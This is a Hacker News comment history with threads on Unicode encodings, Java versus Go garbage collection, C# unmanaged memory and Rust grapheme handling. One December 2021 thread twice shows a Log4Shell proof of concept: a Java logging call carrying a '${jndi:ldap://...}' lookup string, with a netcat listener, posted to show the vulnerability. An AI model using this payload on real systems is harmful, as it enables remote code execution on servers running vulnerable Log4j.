natanbc's comments

natanbc · on Jan 6, 2023

Only on older CPUs, they started fusing off AVX512 on newer silicon batches (even on 12th gen)

natanbc · on Jan 6, 2023

Only in codepoints, but it still has the problem GP mentions of ` + e = è being two codepoints (so two elements in UCS-32), but being logically one character

https://manishearth.github.io/blog/2017/01/14/stop-ascribing...

qalmakka · on Jan 8, 2023

This, it's pointless to have char32_t if you still need to pull several megabytes of ICU to normalize the string first in order to remove characters spanning over multiple codepoints. UTF32 is arguably dangerous because of this, it's yet another attempt to replicate ASCII but with Unicode. The only sane encoding out there is UTF-8, and that's it. If you have to always assume your string is not really splittable without a library, you won't do dangerous stuff such as assuming `wcslen(L"menù") == 4`.

natanbc · on Dec 10, 2021

I posted this in reply to a sibling comment, but the "correct" way is still vulnerable

Start nc (nc -lp 1234) and run this

    org.apache.logging.log4j.LogManager.getLogger("whatever").error("not safe {}", "${jndi:ldap://127.0.0.1:1234/abc}")

maxdamantus · on Dec 10, 2021

Thanks, didn't realise that. So the issue is deeper than misuse of user input (I've edited my post).

natanbc · on Dec 10, 2021

The RCE works with both ways, start nc (nc -lp 1234) and run this

    org.apache.logging.log4j.LogManager.getLogger("whatever").error("not safe {}", "${jndi:ldap://127.0.0.1:1234/abc}")

ianlevesque · on Dec 10, 2021

Well that’s just appalling.

natanbc · on Nov 23, 2021

> In a multithreaded program, a bump allocator requires locks. That kills their performance advantage.

Java uses per-thread pointer bump allocators[1]

> While Java does it as well, it doesn’t utilize this info to put objects on the stack.

Correct, but it does scalar replacement[2] which puts them in registers instead

> Why can Go run its GC concurrently and not Java? Because Go does not fix any pointers or move any objects in memory.

Most java GCs are concurrent[3], if you want super low pauses you can get those too[4][5]. Pointers can get fixed while the application is running with GC barriers

[1]: https://shipilev.net/jvm/anatomy-quarks/4-tlab-allocation/

[2]: https://shipilev.net/jvm/anatomy-quarks/18-scalar-replacemen...

[3]: https://shipilev.net/jvm/anatomy-quarks/3-gc-design-and-paus...

[4]: https://wiki.openjdk.java.net/display/zgc/Main

[5]: https://wiki.openjdk.java.net/display/shenandoah

sam_bishop · on Nov 23, 2021

I agree. The author seems to know quite a bit about Go and GCs, but doesn't seem to have much experience with Java. As a Java performance engineer, it sounds like he is comparing Go to how he thinks Java works based on what he's read about it.

pjmlp · on Nov 23, 2021

Additionally he doesn't seem to know that much about C#, which also has advanced GC, while allowing for C++ like memory management, if needed.

bullen · on Nov 24, 2021

It's odd how most people that haven't used a VM with GC are amazed by Go (no VM) and WASM (no GC) but still fail to understand that with a GC _AND_ VM you can code something that doesn't crash even if you make a big mistake!

And they haven't even bothered to try it out!

To use anything other than JavaSE/C# on the server you really need very good arguments!

pjmlp · on Nov 24, 2021

Or being amazed by Go's compile speed, when Turbo Pascal and Object Pascal compilers were already doing that in the 1980's, or finding WASM innovative when polyglot bytecodes with no GC also go back to the early 1980's, like Amsterdam Compiler Kit EM as one example among many.

vinkelhake · on Nov 24, 2021

The innovation in WASM is more about getting all the major players in the browser space to agree and support it as a first-class citizen in the web stack. That polyglot bytecodes existed in the early 1980's does nothing for the web.

bullen · on Nov 24, 2021

What a perfect example, have you even tried Java?

I'm guessing you are coding for the client?

C++ arrogance is the problem here.

About the pipe dream of WASM there are 3 problems:

1) Compile times (both WASM and the browser)

2) If you thought Applets where insecure (btw they wheren't) wait until the .js (also a VM with GC...) bindings that you are forced to go through to reach anything from WASM securely gets attention!

3) If you build for the browser you have Intel, Nvidia, Microsoft and Google (do you work there, might explain things) to deal with on Windows. You DON'T want that... use C to build for linux on ARM/RISC-V has to be one of your options and then all that work you spent on getting WASM to work is wasted. (because you won't have the performace/electricity/money for the cycles you need in the long term)

Edit: Please don't replace Python (that you should probably never have touched) with Go...

thrashh · on Nov 24, 2021

1) No one was realistically compiling C++ or Python to Java though. WASM is not new tech as the other poster said — it’s people coming together to support one compile target that also works on the web, which itself is the crowning achievement.

2) Building a secure VM is easy. You only need to give it access to things it should have access to. If a VM has only math instructions, it’s not going to access the file system. My computer can’t poke my nose because there is literally no machine instruction for it.

Java did not build its VM that way. Instead, the JVM had full access to everything and individual functions were blacklisted within Java applications and this was enforced by Java code running in the same machine as the attacker’s code. Naturally every blacklist works like a sieve.

bullen · on Nov 24, 2021

When I think about it, the memory security is probably the weakest point of WASM and probably also the reason nothing of value has come out of that initiative yet.

How does WASM protect memory?

Or maybe there is something valuable made in WASM and I don't know about it, Figma is I think, but I'm not in the target audience.

unscaled · on Nov 24, 2021

Not to mention Turbo Pascal was compiling faster than Go, on a single-core, in-order 20Mhz PC...

tsss · on Nov 24, 2021

With more advanced language features too.

pjmlp · on Nov 24, 2021

Yep, Turbo Pascal 7.0 vs Go 1.0.

zerocount · on Nov 24, 2021

I just wrote some Go last weekend and the compile time was very slow. It reminded me of Scala. Any way I switched to Ruby and didn't have to deal with it any more. Turbo Pascal really was fast, but I don't see that in Go.

vips7L · on Nov 24, 2021

Scala and SBT are some of my biggest productivity killers. They murder my machine and take years to do compile.

fnord123 · on Nov 24, 2021

> To use anything other than JavaSE/C# on the server you really need very good arguments!

Haha! Quoting this so you can't delete it.

mappu · on Nov 24, 2021

Most programmers use PHP, Python, Ruby, Node.js which are all GC bytecode VMs.

What language are you imagining as an argument here?

omnicognate · on Nov 24, 2021

C# makes it possible to do C (not C++) like memory management but it does not make it easy. Unsafe C# code is really, really, really unsafe, much more unsafe than equivalent C code, and does not compose well. It's improving, with Span/Memory, etc, but it remains an absolute last resort.

pjmlp · on Nov 24, 2021

C and C++ memory managements are alike, C# doesn't need reference counted library types.

If you mean RAII, they can be easily done with IDisposable, using and Rosylin analysers that throw errors when usings are forgotten.

And yes, manually memory management should be last resource, proven by profiler data.

omnicognate · on Nov 24, 2021

I do mean RAII, which is fundamental to C++. Memory management without it is not "C++ like".

IDisposable is not a substitute for RAII, and C# has nothing that can manage ownership in equivalent ways as it lacks deterministic destruction. Implementing, for example, a data structure based on unmanaged memory in C# in such a way that it can be safely used by code outside the library without undermining the safety of the language (i.e. without introducing the possibility of programming errors outside the data structure implementation causing leaks or memory corruption) is an exercise in discipline and requires a thorough understanding of the runtime - eg. knowing that an object can be garbage collected while a method on it is executing. I know this because I've done it (as a last resort after extensive profiling and production use of various optimised, managed versions of the library).

pjmlp · on Nov 24, 2021

Maybe you should explore better Marshall Interop services and the span related improvements.

IDisposable is definitely an alternative when coupled with Roslyn analysis or SonarQube.

As if doing it in C++ doesn't require the same knowledge level, worse actually, as it also requires ISO C++ mastery and a good knowledge of how each compiler being used handle IB and UB.

Also unless static analysis is getting used, RAII can also get thr ownership wrong, specially with use after move errors, or smart pointers incorrectly given as arguments.

omnicognate · on Nov 24, 2021

I used Spans extensively. They help (mostly by providing efficient bounds checking), but not much. The main problem, as I mentioned initially, is the composability of this sort of code.

I wasn't trying to give some kind of defence of C++ here, just pointing out the dissimilarities to C#. This particular piece of code would have been far easier in C++ and RAII would have been a huge help, but the system as a whole would have been an utter nightmare in C++ (which I know because I've worked on multiple similar systems in C++).

pjmlp · on Nov 24, 2021

Sure, but I am the opinion it does compose, if one embraces it isn't the same as writing C++ in C#, not trying to downplay your experience on the matter.

For example, here are the Roslyn analysers for a more RAII like experience with IDisposable,

https://github.com/DotNetAnalyzers/IDisposableAnalyzers

Turn "DISP004-Don't ignore created IDisposable." into a compiler error and you have your region allocated RAII like experience.

And moving a bit the goal posts, for those scenarios where C# fails completly to provide a usefull solution, we can rewrite just that module into C++ (preferably C++/CLI when only Windows matters), and have the best of both languages.

legulere · on Nov 24, 2021

There's also ref which is almost like pointers and safe. Span/Memory do not remain an absolute last resort, they are becoming the standard way for string formatting/parsing/(de)serialization and IO.

omnicognate · on Nov 24, 2021

I didn't say Span/Memory are a last resort, I said C style memory management (AllocHGlobal/Free), despite being somewhat improved by Span/Memory, remains an absolute last resort. Span/Memory aren't primarily aimed at handling unmanaged memory, though they're useful for it.

pjmlp · on Nov 24, 2021

Of course C style memory management is a last resort, 99% of devs don't need it, and the 1% that actually need it, better learn to use V-Tune.

tp600 · on Nov 24, 2021

why is it more unsafe than equivalent C code? I always thought it's simply a way to enable C-like real pointers/native memory ...

mappu · on Nov 23, 2021

"Scalar replacement" explodes the object into its class member variables and does not construct a class object at all. That does result in the exact same `sub %esp` (that Go would do for any struct), but it is restricted to only working if every single usage of that class type is fully inlined and the class is never passed anywhere that needs it in its object form.

It's worse than what Go has. Go can stack-allocate any struct and still pass pointers to it to non-inlined functions.

pkolaczk · on Nov 23, 2021

Scalar replacement does not work even in very trivial cases: https://pkolaczk.github.io/overhead-of-optional/

In all those cases, Optionals were inlined, didn't escape, yet they haven't been properly optimized out.

chrisseaton · on Nov 24, 2021

Did you understand why?

pkolaczk · on Nov 24, 2021

I don't know the exact reason here, but from my experience JVMs don't seem to perform optimisations as deep as static compilers. You can see the compiler not only missed scalar replacement here, but also didn't use a conditional move to avoid branching neither it performed any loop unrolling. Maybe it is because JITs are constrained by time and resources a lot more.

chrisseaton · on Nov 24, 2021

It'd be worth doing a deep dive into this - you can look at the compiler's intermediate representation to understand why it didn't make an optimisation. There may be something trivial getting in the way.

altfredd · on Nov 24, 2021

Scalar replacements (as currently implemented in Java) does not work in real-world programs.

Well-written code does not need it. Poorly written code can not trigger it, because the JIT is too dumb and isn't getting better.

There is no sane test to determine whether a piece of code will be inlined in Java. In practice anything more complex than byte array is unlikely to be inlined. Even built-in ByteBuffers aren't! Meanwhile Go compiler treats Go slices just as nicely or better than arrays.

native_samples · on Nov 24, 2021

The JIT is getting better. Major escape analysis upgrades are a big part of where Graal (a drop-in replacement for the HotSpot JIT) gets its performance boosts. EA definitely does work well there because Truffle depends on escape analysis and scalar replacement very heavily. GraalVM CE is better than regular HotSpot at doing it and GraalVM EE is even better again.

altfredd · on Nov 24, 2021

Graal effort is over 10 years old.

Jaotc, — Graal's sole mainstreamed part, — has been recently removed from OpenJDK in 17th release, and Oracle says [1], that they are "considering the possibility of using C2 for ahead-of-time"

1: https://mail.openjdk.java.net/pipermail/discuss/2020-Novembe...

kaba0 · on Nov 24, 2021

It’s almost as if graal and openjdk are separate projects with different use cases. Also, they are not competing (in the usual meaning) since both are developed by Oracle.

pjmlp · on Nov 24, 2021

Which JIT? There are plenty of them to choose from across Java implementations.

majou · on Nov 23, 2021

ZGC[4] in particular has me excited, enough so to want to pick up a JVM language.

Thaxll · on Nov 23, 2021

ZGC and Shenandoah can be slower than G1, those are not silver bullets. The fact that there is 4-5 GCs explains the situation, there is not a single GC that is better than the others.

It really depends of the workload.

geodel · on Nov 23, 2021

Indeed. It is strange that no official JDK document puts pros/cons of GCs packaged with standard JDKs in some kinda easy-to-read table/matrix.

kaba0 · on Nov 23, 2021

Well, unless latency is explicitly a problem with the default (G1) GC, it probably should not be changed to begin with. It is a beast of a GC with a very good balance between throughput and latency. Also, if the latter is problematic, the first thing should be to fiddle with the singular G1 knob (one should set, unless they really know what they are doing), target pause time — throughput and latency are fundamentally opposing goals.

G1 by default has low enough pauses as well, but it does increase with the speed of garbage creation. But it handles even ridiculously high throughputs with graceful degradation of pause times.

Here is a really great blog on various aspects of modern GCs (and don’t forget that we are at Java 17, with small but significant GC updates in each version): https://jet-start.sh/blog/2020/06/23/jdk-gc-benchmarks-remat...

geodel · on Nov 24, 2021

Right it is all good. As I said how difficult it would for official document to put out a comparison table. A comparison around latency/throughput/Heapsize/Cost(Mem/CPU) should be reasonable enough for developers to choose right GC for their applications.

the-alchemist · on Nov 23, 2021

ZGC is already available, since JDK 15, September 2020. =)

https://wiki.openjdk.java.net/display/zgc/Main#Main-ChangeLo...

majou · on Nov 23, 2021

Max pause times of 0.5ms is what got me really interested.

It feels like a huge trade-off of GCs is almost completely gone.

https://malloc.se/blog/zgc-jdk16

masklinn · on Nov 23, 2021

> It feels like a huge trade-off of GCs is almost completely gone.

FWIW the tradeoff of low latency GC is usually paid in throughput.

That is definitely the case for Go, which can lag very much behind allocations (so if your allocation pattern is bad enough the heap will keep growing despite the live heap being stable, because the GC is unable to clear the dead heap fast enough for the new allocations).

jatone · on Nov 24, 2021

throughput can be fixed by adding compute. latency cannot. always optimize for latency with gc.

and no the heap will not keep growing in golang. it'll force threads to help with GC if its falling behind. thereby reducing the rate of allocations and speeding up the collection.

ohgodplsno · on Nov 24, 2021

Random Go dev suddenly more of an expert than the literal best-in-class GC experts that have been working on G1GC, ZGC, Shenandoah, Parallel, ConcMarkSweep and others.

GCs are a matter of tradeoffs. Always optimizing for latency is Go's solution, but there are reasons for everything. It's the very reason why the JVM has so many knobs. Yes, it requires a PhD to know what to tune, but there are many parameters for the thousands of different situations that can arise.

jatone · on Nov 24, 2021

rolls eyes I've tuned java's GC for highly available and massive throughput systems.

pretty familiar with the trade offs. java's problem isn't GC (in general) its problem is memory layout and the fact it can't avoid generating a metric shit ton of garbage.

G1GC was a good improvement and I stopped paying attention at that point because I no longer had to deal with its problems (left the ecosystem).

I'm not asserting java hasn't improved or that its GC implementations aren't modern marvels. fundamentally they're just a self inflicted wound.

golang wouldn't benefit anywhere near as much as java has from these implementations because guess what... they've attempted GC that operate under similar assumptions, young allocations, compacting patterns, etc. and they failed to make an improvement that just increasing the heap size knob wouldn't fix using the current GC.

titzer · on Nov 25, 2021

> it can't avoid generating a metric shit ton of garbage.

IMHO this is an often-overlooked aspect of Java and I get flak for pointing out that Java programs are often full of defensive copying because the Java style encourages it. The JDK is very trashy and highly biased against reusing objects or doing anything in-place without creating garbage. You can't, for example, parse an integer out of the middle of a string.

15 years ago when I wrote a lot more Java, I could get away with avoiding JDK libraries to write tight and small Java code (yeah, omg, mutable non-private fields). That was how I got my AVR microcontroller emulator to beat its C competitors. Nowadays if you write that kind of code you get a beatdown.

JVMs work really hard to deal with trashy Java code. Generics make everything worse, too; more hidden casts and adapter methods, etc.

native_samples · on Nov 24, 2021

Only in some kinds of apps, like web servers where all the heavy lifting is being done by the database anyway.

Consider a compiler. It's not infinitely scalable to multiple cores. It may not even be multi-threaded at all. It also doesn't care about pause times - for that you want Parallel GC.

jatone · on Nov 24, 2021

depends on the compiler and language. golang seems to counter point your position quite handedly. having one of the fastest compile times and being highly concurrent.

if your application is so simple it doesn't use concurrency then 99% of the time you can completely remove the need for GC by preallocating slabs.

native_samples · on Nov 25, 2021

The Go compiler is fast because it doesn't do very much, not because Go's GC is good for throughput oriented jobs.

Go has repeatedly tied itself in knots over the years because they have a goal of not making the compiler slower, yet, the GC needs of the compiler are diametrically opposed to the needs of the HTTP servers Go is normally used for.

https://go.dev/blog/ismmkeynote

"As you can see if you have ROC on and not a lot of sharing, things actually scale quite nicely. If you don’t have ROC on it wasn’t nearly as good ... At that point there was a lot of concern about our compiler and we could not slow down our compilers. Unfortunately the compilers were exactly the programs that ROC did not do well at. We were seeing 30, 40, 50% and more slowdowns and that was unacceptable. Go is proud of how fast its compiler is."

earthboundkid · on Nov 27, 2021

For a compiler, the GC strategy that makes most sense is to never deallocate. The compiler is going to die shortly. No need to do the bookkeeping of figuring out how to deallocate before that happens.

silon42 · on Nov 23, 2021

There's still a memory tradeoff, some due to GC, some due to Java (lots of runtime reflection...). Guessing 2-4x.

marginalia_nu · on Nov 23, 2021

This is a bit of a tangent, but you can get into situations where Java's memory-overhead becomes pretty untenable. I was in a situation of having to keep track of ~1 billion short strings of a median length of maybe 7 characters.

In terms of just data, that should clock in at about 10 Gb; in practice it was closer to 24 Gb. I tried going with just byte[]-instances instead, which didn't help a lot. Using long byte[]-instances and indexing those doesn't help as much as you'd think because they get sliced up into small objects behind the scenes.

I ended up memory mapping blocks of memory and basically implementing my own append-only allocator.

jeeeb · on Nov 23, 2021

FWIW. This would probably present a challenge in most (all?) languages.

For example in libc++ due to SSO an std::string has a minimum size of 24 bytes.

For a billion strings less than 15 chars (+ the null byte) that gets you to 24GB, and that’s optimistically assuming each string is allocated in place.

I doubt heap allocated char* would do much better either. Just having a billion 8 byte pointers eats a lot of memory. You’d really need some sort of string packing scheme similar to what you did in Java.

marginalia_nu · on Nov 23, 2021

It's a lot easier to build custom allocators in C++ though.

For one, Java has a maximum mmap-size of 2 Gb, and as a cherry on top of that turd, you have no control over their lifecycle. The language is very clearly not designed for this type of work, and if you try to make it do it anyway, it fights you every step of the way.

_old_dude_ · on Nov 23, 2021

It has nothing to do with the language but with the API / VM capabilities.

Both those restrictions are fixed, granted that this is not yet in the offical API, it's an incubation module (the equivalent of from __future__ of Python).

https://docs.oracle.com/en/java/javase/17/docs/api/jdk.incub...

kasperni · on Nov 23, 2021

The foreign memory API which is currently incubating should help with most of these limitations: https://openjdk.java.net/jeps/419

native_samples · on Nov 24, 2021

Right - specifically they invented a way to make closing an mmapped segment safe and fast. The reason you can't officially (without private APIs) unmap something in current Java is because if you did then other threads would segfault, and "no segfaults" is kind a defining characteristic of Java. The new API fixes this using more VM magic, so closing a mapping from one thread will cause other threads to throw exceptions, but this is done without sacrificing performance (it doesn't require checking a status every time you read from memory).

hashmash · on Nov 23, 2021

The Lilliput project aims to address this: https://wiki.openjdk.java.net/display/lilliput

CyberDildonics · on Nov 23, 2021

I would never write something like this in java, but to be fair, a program shouldn't be written like this in the first place. If you "need" a billion strings in memory and you didn't design for that with something that would scale better, you messed up a long time ago.

marginalia_nu · on Nov 23, 2021

Huh, I didn't really have a problem solving the problem as it came up. Like many scaling problems, it wasn't a problem until it was. Then I fixed it. Now I have a solution that can deal with ten times as many strings as before. If I grow out of that one, I'll come up with a better design.

I could have gotten 10 times as much hardware instead, but that would be an incredible waste of money compared to just spending a few days writing more hardware-efficient code.

sitkack · on Nov 24, 2021

I have addressed similar problems using a typed array of contiguous memory and another array of lengths.

marginalia_nu · on Nov 24, 2021

I did try exactly that, but the GC overhead was still prohibitively high for my use case, made because big arrays in practice are composed from shorter non-contiguous arrays to make garbage collection even remotely possible.

sitkack · on Nov 25, 2021

Hmmm, if the typed array only contains primitives, the GC isn't looking inside the array. If the thing pointed to, can never contain a pointer, it won't need to be scanned.

lmm · on Nov 24, 2021

A factor of 2.4 is extremely unlikely to be what makes the difference between a program being viable and not. You have to be in an extremely fine-tuned situation for that to make the difference, and unless your usage level is unusually static it's probably only going to make the difference for a few weeks or months.

marginalia_nu · on Nov 24, 2021

So for some context, I'm running a search engine on consumer hardware. Coaxing power out of limited hardware is sort of my bread and butter. How many of these strings I can keep in memory limits how many documents I can index. Doubling that number is quite significant.

This number is orthogonal to how many searches I can serve, that is already a solved problem (through similar craftiness). Multiple searches per second sustained load is fine. The search engine has held up to the hacker news front page, which is something many supposedly non-interactive sites struggle with.

This is a non-profit operation, so unless someone just decides to pay me a months salary or two, I'm not able to meaningfully increase the hardware. I'm stuck with what I've got and will make the most of it.

lmm · on Nov 25, 2021

The time of someone who can do that kind of crafty tuning is almost certainly worth more than the hardware. If nothing else, I'd think having you do a week or two of consultancy and buy more hardware with the proceeds would be more efficient in terms of getting things done. (I appreciate that nonprofits have a lot of particular constraints that mean that that's probably not a practical way forward).

vardump · on Nov 24, 2021

Playing a devil's advocate here: a use case might already be hitting the maximum per server RAM.

A factor of 2.4 might mean 2.4 times more hardware. You might need 240 servers instead of 100.

lmm · on Nov 24, 2021

Sure. And? Everything that you need to do to manage 240 servers, you need to do to manage 100 servers. Like I said, if you're in the scaling stage then you'll be getting to 240 in a few months either way, so you need to be ready for it. 2.4x higher operating expenses matter eventually, when you're a mature organisation, but if the software is under active development you almost certainly have higher priorities.

kaba0 · on Nov 23, 2021

Also, throughput. But latency and throughput are almost universally opposite ends of the same axis — that’s why it’s great that Java allows for choosing a GC implementation.

jatone · on Nov 24, 2021

you can fix throughput problems by adding compute resources, you can't fix latency issues. I'll always pick a GC that optimizes latency over throughput. its easier to maintain the software.

masklinn · on Nov 23, 2021

The GC memory overhead affects all languages with a GC more advanced than refcounting. It certainly does affect Go as well.

natanbc · on June 23, 2021

It does for multi-codepoint characters (such as the rainbow flag): https://play.rust-lang.org/?version=stable&mode=debug&editio...

Elixir gets it right: https://replit.com/@natanbc/reverse

brundolf · on June 23, 2021

Yeah, another commenter mentioned grapheme-clusters, though apparently there's a readily available crate that adds support: https://stackoverflow.com/questions/58770462/how-to-iterate-...

According to this they added it to the standard library at one point but then broke it back out because the lookup tables were too large

pjgalbraith · on June 23, 2021

Here is a working rust version https://play.rust-lang.org/?version=stable&mode=debug&editio...